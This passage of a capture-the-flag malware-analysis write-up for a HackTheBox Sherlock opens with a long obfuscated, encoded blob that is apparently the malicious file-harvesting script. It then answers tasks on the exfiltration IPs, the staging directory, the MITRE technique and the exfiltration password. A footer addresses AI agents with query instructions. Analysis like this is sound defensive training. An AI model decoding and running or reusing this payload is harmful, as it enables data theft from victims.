NnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaUJTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSjNiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF
```

**Answer:** `35.169.66.138,44.206.187.144`

***

## **Task 9**

### Question

The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?

### Solution

You can find the directory in the deobfustcated code as shown in the following image.

<figure><img src="/files/opNP3YNn0RcwsjHE5vBa" alt=""><figcaption></figcaption></figure>

**Answer:** `C:\Users\Public\Public Files`

***

## **Task 10**

### Question

What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?

### Solution

The malicious binary uses the MITRE Techinque with an ID of `T1119`. You can find more details about this technique in the following link.

{% embed url="<https://attack.mitre.org/techniques/T1119/>" %}

<figure><img src="/files/Wp4SxYVHzM6jf5yk4xSj" alt=""><figcaption></figcaption></figure>

**Answer:** `T1119`

***

## **Task 11**

### Question

What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?

### Solution

You can find the password in the deobfustcated code as shown in the following image.

<figure><img src="/files/hGtNz7jitrPDS8mmBe9j" alt=""><figcaption></figcaption></figure>

**Answer:** `M8&C!i6KkmGL1-#`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thamizhiniyancs.gitbook.io/writeups/hackthebox/sherlocks/malware-analysis/easy/heartbreaker-continuum.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.